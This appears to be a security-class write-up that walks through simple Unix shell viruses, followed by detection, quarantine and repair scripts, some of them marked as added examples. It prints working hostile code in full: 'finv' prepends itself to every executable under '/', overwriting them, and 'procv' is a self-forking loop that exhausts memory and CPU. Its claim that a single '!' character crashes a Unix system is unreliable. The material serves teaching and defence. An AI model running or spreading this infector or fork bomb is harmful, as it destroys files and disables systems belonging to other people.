This is a series of Unix process and file infecting viruses with a few detection and cleansing mechanisms. They are very simple, but illustrate enough of the concepts to understand how real viruses and anti-viruses work in the general sense. I wrote these as part of a computer security class on viruses, worms, and distributed coordinated attacks. In fact, they might have been my first shell scripts, as scary as that sounds.

finv - File Infecting Virus

This is a simple yet very malicious file infecting virus with self-recognition and filtering capabilities.

Line 1 is exactly what it says: it is there so the virus does not infect the same file more than once (explained later).

Line 2 uses the 'find' command, which sweeps through a specified directory in search of files with particular traits. The specified directory is '/', in other words the top of the file system, so everything under it is included. No traits are set, so it reports everything (like a wild card). The 'if' statement begins the filtering process. '&&' means AND. '[...]' is equivalent to the 'test' command, which, like the arguments you could pass to 'find', checks whether particular traits or conditions exist. '! -d' makes sure the name reported by 'find' is NOT (!) a directory (-d). The second condition makes sure it is executable (-x). If it is 1) not a directory AND 2) executable, line 3 begins. If either condition fails, the 'else' statement is executed, which reports 'noway' to the screen. This is not necessary, but it helps determine whether the script works correctly.

Line 3 uses the same '[...]', or 'test', command. It first uses the 'head' command to read the first line (-n 1) of each file passed from line 2. If that line does not equal (!=) the infection marker (#infect_mark), the file is infected. If the file already contains the marker, it is ignored and control once again passes to 'echo'. This is how the virus is kept from infecting the same file twice.
'cat' combines $0 (the virus code) and $infect (the newly found host file) and writes the result to a file in a temporary directory (/tmp/z). By passing 'cat' two files instead of one, the second is appended to the end of the first, giving the viral code priority (it is executed first) over any other code in the file. The temporary file is then moved to $infect, overwriting the original.

## BEGIN CODE
#infect_mark
for infect in $(find /); do if [ ! -d $infect ] && [ -x $infect ]
then if [ "$(head -n 1 $infect)" != "#infect_mark" ]; then cat $0 \
$infect > /tmp/z; mv /tmp/z $infect; else echo noway; fi; fi; done
## END CODE

You can test this code in a small environment rather than the whole '/' directory. Place the virus in a directory together with an executable script with '#infect_mark' as the very first line; an executable script without the infection marker; a non-executable file; and a subdirectory containing an executable without the infection marker. The virus itself, the executable script with the marker, and the non-executable file will not be affected; for these instances you should get a 'noway' returned. The executable without the marker, as well as the similar file within the subdirectory, should be infected. Their contents and file size will prove it.

The 1 byte Process Virus

This script (or single character) can be classified as a (process) virus when the following conditions are met:
When run, it will crash the Unix system immediately. For statistics on its efficiency and brutality, as well as exactly what it does, see the notes at the end of the 'procv' virus.

## BEGIN CODE
!
## END CODE

procv - Process Virus

The following code is classified as a process virus. Its ability to reproduce endlessly comes from a 'while' loop whose test always returns an exit status of 0 (zero), because the statement in brackets is always true. As long as (while) the statement is true, the 'eval $0 &' statement is executed. 'eval' runs the given arguments through command line processing. The given arguments are '$0' (the name of the script invoking this) and '&' (to fork the new child process into the background). So the script calls itself endlessly, and the number of copies grows exponentially. For monitoring purposes, each instance prints a unique time stamp by calling the 'date' command with the arguments '%D%H%M%S%N', which stand for Day, Hour, Minute, Second, and Nanosecond. It stores this value in the variable named 'nan_time'. 'echo' then appends it, by redirecting stdout, to a file named 'unique.txt'.

## BEGIN CODE
while [ 1 ]; do eval $0 &; nan_time=$(date '+%D%H%M%S%N'); echo $nan_time >> unique.txt; done
## END CODE

So what?? It hangs the system immediately. 497 of 502 MB RAM were filled instantly, CPU usage rose to 100% and swap space began filling up very fast. Needless to say, the system was useless until rebooted with the reset button on the tower.

Prove it! Well, 'unique.txt' was retrieved after rebooting the hung system. It showed 831 strings, meaning the script reproduced 831 times in the allotted time. I assume they are unique because nanosecond precision would only be non-unique if something occurred faster than one billion times per second. The difference between the last time stamp and the first shows the script was active for 41 seconds and 446920000 nanoseconds.
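As an added example (not part of the original write-up), here is how a defender would spot a 'procv'-style storm from a process listing: hundreds of processes with the same command name under one user. The listing below is constructed; on a live system it would come from 'ps -eo user,pid,ppid,comm', and all function names are this example's own.

```shell
#!/bin/sh
# Added example, not from the original write-up: detect a 'procv'-style
# process storm in a "ps -eo user,pid,ppid,comm" listing read from stdin.
# Every function here is an assumption of this example, not a system tool.

# count_by_user_comm < PSLIST: emit "user command count", busiest first.
# The header line (NR == 1) is skipped; $1 is the user, $4 the command name.
count_by_user_comm() {
    awk 'NR > 1 { n[$1 " " $4]++ } END { for (k in n) print k, n[k] }' |
        sort -k3,3nr
}

# flag_storms [THRESHOLD] < PSLIST: print every user/command pair with more
# than THRESHOLD (default 50) live processes; exit 1 if any were found, so
# the function can drive an alert or a kill of that user's processes.
flag_storms() {
    count_by_user_comm |
        awk -v t="${1:-50}" '$3 + 0 > t + 0 { print; bad = 1 }
                             END { exit (bad ? 1 : 0) }'
}

# sample_ps: a constructed listing (not a real capture) with three ordinary
# processes and 60 copies of procv.sh under user alice, each a child of the
# previous one, as the page's "eval $0 &" loop would produce.
sample_ps() {
    printf 'USER PID PPID COMMAND\nroot 1 0 init\nalice 800 1 bash\nbob 900 1 vim\n'
    i=1000
    while [ "$i" -lt 1060 ]; do
        printf 'alice %d %d procv.sh\n' "$i" $((i - 1))
        i=$((i + 1))
    done
}

# Stand-alone run: report the storm in the constructed sample.
sample_ps | flag_storms 50 || echo "process storm detected (exit 1)"
```

The lasting fix is a per-user process cap (RLIMIT_NPROC), for example 'alice hard nproc 200' in /etc/security/limits.conf, so the loop's forks fail instead of exhausting RAM and swap.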
dtectiq - Detection With Isolation and Quarantine

Dtectiq stands for detection script with isolation and quarantine motive. This is the guy that hunts down all the files previously infected by the 'finv' virus. For each infected file it finds, the script isolates it in a shared folder and removes its ability to be executed, either accidentally or intentionally. First it creates a folder named 'jail' in the home directory (~) of the user who invokes the script. It uses the same 'find' mechanism to locate infected files that the file infector 'finv' used to locate un-infected files. All files testing positive are removed from their current position and relocated to the 'jail' directory. There, 'chmod' recursively (-R) removes execute permission for all users (a for all; -x to remove execute permission) from the scripts now in the folder. It does not remove read or write permission, so the user can view and/or repair the script after detection.

## BEGIN CODE
mkdir ~/jail; for dirty in $(find /); do if [ "$(head -n 1 $dirty)" \
= "#infect_mark" ]; then mv $dirty ~/jail; fi; done; chmod -R a-x ~/jail
## END CODE

dtectrr - Detection With Remove and Repair

Dtectrr stands for detection script with remove and repair motive. It is effective only when the size of the virus and the location of its code within the infected file are known. Here is how it works:

Locating:

Calculating:

Code removal:

## BEGIN CODE
# Enter the size of your virus (in characters)
CHAR=208
# Enter your virus signature string
MARK="#infect_mark"
# Enter location of your virus in the file
# NOTE: if at the end you want to choose 'head'
# and if at the top choose 'tail' -- it seems
# backwards but it's not.
LOC=tail
for extract in $(find /); do if [ "$(grep $MARK $extract)" ]; then
$LOC -c $(( $(cat $extract | wc -c) - $CHAR)) \
$extract >>/tmp/x; mv /tmp/x $extract; fi; done
## END CODE
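As an added example (not the page's own dtectiq or dtectrr scripts), here are the same detect, quarantine and repair steps in a form that handles filenames with spaces, skips directories and non-executables, and drops the viral prefix with 'tail -c +N' instead of subtracting CHAR from the file size. It assumes GNU coreutils and the '#infect_mark' marker; the quarantine directory and the byte count to strip are parameters, and all function names are this example's own.

```shell
#!/bin/sh
# Added example, not the page's own scripts: detect files carrying the
# "#infect_mark" prefix, quarantine them with execute bits removed, and
# repair them by discarding a viral prefix of known size. Assumes GNU
# coreutils (head/tail/chmod/basename accept "--").
MARK="#infect_mark"

# is_infected FILE: true when FILE is a regular, executable file whose first
# line is exactly the marker. Directories, devices and data files never match,
# which an unquoted "head -n 1 $file" over "$(find /)" does not guarantee.
is_infected() {
    [ -f "$1" ] && [ -x "$1" ] && [ "$(head -n 1 -- "$1")" = "$MARK" ]
}

# scan ROOT: print every infected file under ROOT, one per line. find hands
# the names to a child shell instead of word-splitting $(find ...), so names
# with spaces survive. The child always exits 0 so a miss is not a failure.
scan() {
    find "$1" -type f -exec sh -c '
        for f; do
            [ -x "$f" ] && [ "$(head -n 1 -- "$f")" = "$0" ] && printf "%s\n" "$f"
        done; exit 0' "$MARK" {} +
}

# quarantine FILE JAIL: move FILE into JAIL (created if needed) and strip all
# execute bits, leaving it readable so it can still be inspected and repaired.
quarantine() {
    mkdir -p -- "$2" && mv -- "$1" "$2"/ &&
        chmod a-x -- "$2/$(basename -- "$1")"
}

# repair FILE NBYTES: drop the first NBYTES bytes (the prepended virus) and
# rewrite FILE in place, keeping its inode and its (now non-executable) mode.
# "tail -c +N" prints from byte N onward, so no size arithmetic is needed.
repair() {
    tmp=$(mktemp) || return 1
    tail -c +$(( $2 + 1 )) -- "$1" > "$tmp" && cat -- "$tmp" > "$1"
    rm -f -- "$tmp"
}
```

A full pass is 'scan / | while read -r f; do quarantine "$f" ~/jail; done' followed by 'repair' on each jailed file with the virus size in bytes; keep a copy before repairing in case the size is wrong.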